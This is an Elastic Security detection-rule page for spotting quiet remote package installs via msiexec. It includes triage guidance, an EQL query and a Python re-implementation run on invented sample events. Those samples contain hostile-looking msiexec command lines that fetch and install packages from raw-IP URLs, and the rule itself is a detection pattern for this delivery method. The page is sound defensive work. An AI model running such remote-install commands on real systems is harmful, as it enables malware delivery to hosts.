---
title: Potential Remote Install via MsiExec
description: Identifies attempts to install a file from a remote server using MsiExec. Adversaries may abuse Windows Installers for initial access and delivery of...
url: https://www.elastic.co/elastic/docs-builder/docs/3466/reference/security/prebuilt-rules/rules/windows/defense_evasion_msiexec_remote_payload
products:
  - Elastic Security
---

# Potential Remote Install via MsiExec
Identifies attempts to install a file from a remote server using MsiExec. Adversaries may abuse Windows Installers
for initial access and delivery of malware.
**Rule type**: eql
**Rule indices**:
- endgame-*
- logs-crowdstrike.fdr*
- logs-endpoint.events.process-*
- logs-m365_defender.event-*
- logs-sentinel_one_cloud_funnel.*
- logs-system.security*
- logs-windows.forwarded*
- logs-windows.sysmon_operational-*
- winlogbeat-*

**Rule Severity**: high
**Risk Score**: 73
**Runs every**: 
**Searches indices from**: `now-9m`
**Maximum alerts per execution**: 100
**References**:
**Tags**:
- Domain: Endpoint
- OS: Windows
- Use Case: Threat Detection
- Tactic: Defense Evasion
- Data Source: Elastic Endgame
- Data Source: Elastic Defend
- Data Source: Windows Security Event Logs
- Data Source: Microsoft Defender XDR
- Data Source: Sysmon
- Data Source: SentinelOne
- Data Source: Crowdstrike
- Resources: Investigation Guide

**Version**: 5
**Rule authors**:
- Elastic

**Rule license**: Elastic License v2

## Setup

This rule is designed for data generated by [Elastic Defend](https://www.elastic.co/security/endpoint-security), which provides native endpoint detection and response, along with event enrichments designed to work with our detection rules.
Setup instructions: [https://ela.st/install-elastic-defend](https://ela.st/install-elastic-defend)

### Additional data sources

This rule also supports the following third-party data sources. For setup instructions, refer to the links below:
- [CrowdStrike](https://ela.st/crowdstrike-integration)
- [Microsoft Defender XDR](https://ela.st/m365-defender)
- [SentinelOne Cloud Funnel](https://ela.st/sentinel-one-cloud-funnel)
- [Sysmon Event ID 1 - Process Creation](https://ela.st/sysmon-event-1-setup)
- [Windows Process Creation Logs](https://ela.st/audit-process-creation)


## Investigation guide


## Triage and analysis


### Investigating Potential Remote Install via MsiExec


#### Possible investigation steps

- What remote installer behavior is preserved in the alert?
  - Focus: `process.command_line`, `process.parent.name`, and `process.parent.command_line`, especially quiet install or patch switches, the remote MSI or `TRANSFORMS=` source, and HTTP, raw-IP, public-hosting, or recognized distribution sources.
  - Implication: escalate for quiet remote installs, remote MSTs, or patches from suspicious infrastructure under interactive or script-launcher parents; lower concern only when the command, source, and parent match one recurring deployment, repair, or onboarding pattern.
- Is the msiexec binary identity expected for Windows Installer?
  - Focus: `process.executable`, `process.pe.original_file_name`, `process.code_signature.subject_name`, `process.code_signature.trusted`, and `process.hash.sha256`.
  - Implication: escalate faster when msiexec is renamed, unsigned, untrusted, newly seen, or in a user-writable path; trusted Microsoft identity only confirms the proxy binary, not the remote install.
- Do the parent and ancestry explain why msiexec ran?
  - Focus: `process.parent.executable`, `process.parent.command_line`, `process.Ext.ancestry`, `user.id`, and the affected host.
  - Implication: escalate when browser-adjacent, script, shell, WMI, or unusual interactive ancestry invokes the remote package without a stable workflow; lower concern when the parent, user, and host pattern fits a recognized management or support path.
- Do process events show payload execution after the installer starts?
  - Focus: child starts on the same `host.id` where the child's `process.parent.entity_id` matches the alert's `process.entity_id`, checking the child's `process.command_line`, `process.executable`, and `process.hash.sha256`.
  - Hint: use `host.id` + `process.pid` + a tight alert window only when entity linkage is unavailable, and treat the result as weaker.
  - Implication: escalate when msiexec spawns shells, script interpreters, LOLBins, scheduled-task tools, or user-space binaries tied to the remote package; lower concern when follow-on activity stays inside the same signed product install flow.
- Do the remote source and workflow context fit one legitimate package path?
  - Focus: URL, host, package name, or remote `TRANSFORMS=` in `process.command_line`, plus `process.parent.executable`, `user.id`, and `host.id` context for that source.
  - Hint: if network or file telemetry exists, correlate destination or artifact evidence with `host.id` + `process.entity_id`; use `host.id` + `process.pid` + a tight alert window only without entity linkage. Missing file or network telemetry is unresolved, not benign, and does not block escalation when process evidence is strong.
  - Implication: escalate when the source is raw IPs, public file hosting, look-alike vendors, temp/download staging, or infrastructure unrelated to the expected product; lower concern when source, launcher, user-host scope, and recovered corroboration fit one internal distribution point or vendor service.
- Escalate on suspicious quiet-install intent, mismatched identity or lineage, unfit package source, or payload child execution; close only when process evidence and recovered corroboration align to one exact deployment, repair, or support workflow; preserve and escalate when evidence is mixed or visibility is incomplete. Use same-user or same-host related alerts after escalation only to size scope, not to prove the local alert.


### False positive analysis

- First check whether `http:` or `https:` follows `/i` or `/p` directly (remote source -- investigate) or sits inside a `PROPERTY=` value while the MSI source is local or relative (configuration URL -- likely benign). The rule excludes local `C:\` sources after `/i`; UNC, relative-path, or other local sources with property URLs need manual confirmation or customer-side exceptions.
- Legitimate deployment, patching, or agent-repair workflows can use quiet remote msiexec. Confirm when `process.command_line`, `process.parent.executable`, `user.id`, and `host.id` align to one recurring product path. Do not close on a vendor-looking URL, signed msiexec, or familiar parent name alone.
- Build exceptions from `process.parent.executable`, package source pattern in `process.command_line`, and stable `host.id` or `user.id` cohort. Avoid exceptions on msiexec, `process.parent.name`, domain suffix, or `user.name` alone.


### Response and remediation

- If confirmed benign, reverse any temporary containment and record the installer command, remote package source, parent launcher, signer/hash identity, affected `user.id`, affected `host.id`, and any recovered destination or artifact pattern. Create an exception only after the same workflow recurs across prior alerts from this rule.
- If suspicious but unconfirmed, preserve the alert record, process tree, `process.entity_id` values, installer command line, remote URL or `TRANSFORMS=` value, parent command line, child process records, and any recovered package, destination, or provenance artifacts before containment. Apply reversible controls only when command, parent, or child-process evidence suggests active delivery; otherwise keep evidence collection open rather than starting cleanup.
- If confirmed malicious, preserve process identifiers, command lines, recovered packages, and destination indicators before isolating the host, terminating msiexec or follow-on payloads, blocking confirmed indicators, or removing staged installers, extracted payloads, persistence changes, or scheduled-task material tied to the chain.
- Post-incident hardening: close the delivery path that introduced the remote package, restrict msiexec remote-install use to controlled deployment tooling where feasible, review hosts where installer-elevation policy would increase impact, and document adjacent variants such as remote `TRANSFORMS=` abuse or DLL registration through `/y` and `/z`.


## Rule Query

```eql
process where host.os.type == "windows" and event.type == "start" and
  process.name : "msiexec.exe" and process.args : ("-i*", "/i*", "-p*", "/p*") and
  process.command_line : ("*http:*", "*https:*") and
  process.args : ("/qn", "-qn", "-q", "/q", "/quiet") and
  process.parent.name : (
    "sihost.exe", "explorer.exe", "cmd.exe", "wscript.exe", "mshta.exe",
    "powershell.exe", "wmiprvse.exe", "pcalua.exe", "forfiles.exe", "conhost.exe"
  ) and

  not process.command_line : (
        "*--set-server=*", "*UPGRADEADD=*" , "*--url=*", "*USESERVERCONFIG=*", "*RCTENTERPRISESERVER=*",
        "*app.ninjarmm.com*", "*zoom.us/client*", "*SUPPORTSERVERSTSURI=*", "*START_URL=*", "*AUTOCONFIG=*",
        "*awscli.amazonaws.com*", "*/i \"C:*", "*/i C:\\*"
  )
```
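The rule query above, together with the `/i`-versus-`PROPERTY=` triage check from the false positive section, re-implemented as an added example in Python and run over constructed process-start events. This is not Elastic's code and not the detection engine's EQL evaluator: `wildcard_match` reproduces EQL's case-insensitive `:` wildcard comparison, the event dictionaries use the query's ECS field names, and every host, URL, package name, and parent process in `SAMPLE_EVENTS` is invented for the example. `classify_url` is an assumed heuristic about where msiexec's package operand sits, not logic the rule encodes.

```python
import re
import subprocess

# Patterns copied from the rule query. EQL's ':' operator is a case-insensitive
# wildcard match where '*' is the only metacharacter; wildcard_match() reproduces it.
SOURCE_SWITCHES = ("-i*", "/i*", "-p*", "/p*")
QUIET_SWITCHES = ("/qn", "-qn", "-q", "/q", "/quiet")
PARENT_NAMES = ("sihost.exe", "explorer.exe", "cmd.exe", "wscript.exe", "mshta.exe",
                "powershell.exe", "wmiprvse.exe", "pcalua.exe", "forfiles.exe", "conhost.exe")
EXCLUDED_COMMAND_LINES = (
    "*--set-server=*", "*UPGRADEADD=*", "*--url=*", "*USESERVERCONFIG=*", "*RCTENTERPRISESERVER=*",
    "*app.ninjarmm.com*", "*zoom.us/client*", "*SUPPORTSERVERSTSURI=*", "*START_URL=*", "*AUTOCONFIG=*",
    "*awscli.amazonaws.com*", '*/i "C:*', "*/i C:\\*",
)


def wildcard_match(value, pattern):
    """EQL-style ':' comparison: whole value, case-insensitive, '*' matches anything."""
    regex = ".*".join(re.escape(part) for part in pattern.split("*"))
    return re.fullmatch(regex, value, re.IGNORECASE | re.DOTALL) is not None


def any_match(values, patterns):
    """EQL 'field : (p1, p2, ...)' over a multi-valued field: any value against any pattern."""
    return any(wildcard_match(v, p) for v in values for p in patterns)


def rule_matches(event):
    """True when a process-start event satisfies every clause of the rule query."""
    if event["host.os.type"] != "windows" or event["event.type"] != "start":
        return False
    args, cmd = event["process.args"], event["process.command_line"]
    return (wildcard_match(event["process.name"], "msiexec.exe")
            and any_match(args, SOURCE_SWITCHES)
            and any_match([cmd], ("*http:*", "*https:*"))
            and any_match(args, QUIET_SWITCHES)
            and any_match([event["process.parent.name"]], PARENT_NAMES)
            and not any_match([cmd], EXCLUDED_COMMAND_LINES))


# Assumption about msiexec syntax: the package is either the next argument ('/i pkg.msi')
# or glued to the switch ('/ipkg.msi'); '/passive' and '/promptrestart' start with 'p'
# but carry no package, so they are skipped when looking for the source operand.
SOURCE_SWITCH = re.compile(r"[/-](package|i|p)(.*)", re.IGNORECASE)
NOT_SOURCE_SWITCHES = ("passive", "promptrestart")


def classify_url(args):
    """Triage check from the false positive section: where does the http(s) URL sit?

    'remote-source' - the operand of /i or /p is itself an http(s) URL (investigate)
    'property-url'  - the package is local/relative and the URL is a PROPERTY=value
    'none'          - no http(s) URL among the arguments
    """
    source = None
    for i, arg in enumerate(args):
        m = SOURCE_SWITCH.fullmatch(arg)
        if not m or arg[1:].lower() in NOT_SOURCE_SWITCHES:
            continue
        source = m.group(2) or (args[i + 1] if i + 1 < len(args) else "")
        break
    if source and re.match(r"https?:", source, re.IGNORECASE):
        return "remote-source"
    if any(re.search(r"=https?:", a, re.IGNORECASE) for a in args):
        return "property-url"
    return "none"


def make_event(event_id, parent, args):
    """Build an ECS-shaped event; command_line is derived with Windows-style quoting."""
    return {"id": event_id, "host.os.type": "windows", "event.type": "start",
            "process.name": "msiexec.exe", "process.parent.name": parent,
            "process.args": args, "process.command_line": subprocess.list2cmdline(args)}


# Constructed sample events; every host, URL, and package name is invented.
SAMPLE_EVENTS = [
    make_event("remote-quiet", "cmd.exe",
               ["msiexec.exe", "/i", "http://203.0.113.10/update.msi", "/qn"]),
    make_event("remote-patch", "wscript.exe",
               ["msiexec.exe", "/p", "http://203.0.113.10/fix.msp", "/q"]),
    make_event("glued-switch", "mshta.exe",
               ["msiexec.exe", "/qn", "-ihttps://203.0.113.10/a.msi"]),
    make_event("property-url", "powershell.exe",
               ["msiexec.exe", "/i", "agent.msi", "SERVER_URL=https://rmm.example.internal", "/qn"]),
    make_event("local-source", "powershell.exe",
               ["msiexec.exe", "/i", "C:\\Program Files\\Vendor\\agent.msi",
                "SERVER_URL=https://rmm.example.internal", "/qn"]),
    make_event("not-quiet", "explorer.exe",
               ["msiexec.exe", "/i", "https://downloads.example.com/tool.msi"]),
    make_event("service-parent", "services.exe",
               ["msiexec.exe", "/i", "https://203.0.113.10/x.msi", "/quiet"]),
    make_event("vendor-excluded", "explorer.exe",
               ["msiexec.exe", "/i", "https://zoom.us/client/latest/ZoomInstallerFull.msi", "/qn"]),
]


def triage(events):
    """Map event id -> (rule fired, URL placement) so both signals are reviewed together."""
    return {e["id"]: (rule_matches(e), classify_url(e["process.args"])) for e in events}


if __name__ == "__main__":
    for event_id, (fired, placement) in triage(SAMPLE_EVENTS).items():
        print(f"{event_id:16} fired={str(fired):5} url={placement}")
```

Two of the constructed events are the cases the false positive section calls out: `property-url` fires the rule because the URL is anywhere in `process.command_line` even though the package operand is the relative `agent.msi`, while `local-source` is suppressed by the `*/i "C:*` exclusion despite carrying the same property URL. Note also that `process.args : "/p*"` matches any switch beginning with `p`, so `/passive` alone satisfies that clause of the query; the classifier skips such switches when locating the source operand, which is an assumption of this example rather than behavior of the rule.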

**Framework:** MITRE ATT&CK
- Tactic:
  - Name: Defense Evasion
  - Id: TA0005
  - Reference URL: [https://attack.mitre.org/tactics/TA0005/](https://attack.mitre.org/tactics/TA0005/)
- Technique:
  - Name: System Binary Proxy Execution
  - Id: T1218
  - Reference URL: [https://attack.mitre.org/techniques/T1218/](https://attack.mitre.org/techniques/T1218/)
- Sub Technique:
  - Name: Msiexec
  - Id: T1218.007
  - Reference URL: [https://attack.mitre.org/techniques/T1218/007/](https://attack.mitre.org/techniques/T1218/007/)

**Framework:** MITRE ATT&CK
- Tactic:
  - Name: Command and Control
  - Id: TA0011
  - Reference URL: [https://attack.mitre.org/tactics/TA0011/](https://attack.mitre.org/tactics/TA0011/)
- Technique:
  - Name: Ingress Tool Transfer
  - Id: T1105
  - Reference URL: [https://attack.mitre.org/techniques/T1105/](https://attack.mitre.org/techniques/T1105/)